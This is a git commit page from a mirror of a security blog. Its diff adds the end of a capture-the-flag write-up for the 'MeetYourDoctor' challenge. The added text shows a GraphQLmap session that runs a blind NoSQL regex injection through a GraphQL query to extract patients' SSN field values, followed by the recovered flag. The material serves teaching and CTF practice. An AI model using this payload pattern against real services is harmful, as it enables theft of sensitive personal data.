swisskyrepo
/
swisskyrepo.github.io
mirror of https://github.com/swisskyrepo/swisskyrepo.github.io.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix test - Part 2

pull/1/head
Swissky 2019-06-22 15:17:05 +02:00
parent 2d816cd5c9
commit 21b4f0831e
1 changed files with 13 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
_posts/2019-6-22-HIP19-MeetYourDoctor.md
View File

@ -169,3 +169,16 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex
{% endhighlight %}
Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.
At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output.
{% highlight json %}
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
{% endhighlight %}
I hope you enjoyed the challenges as I did !
Feel free to share the blog post ! :)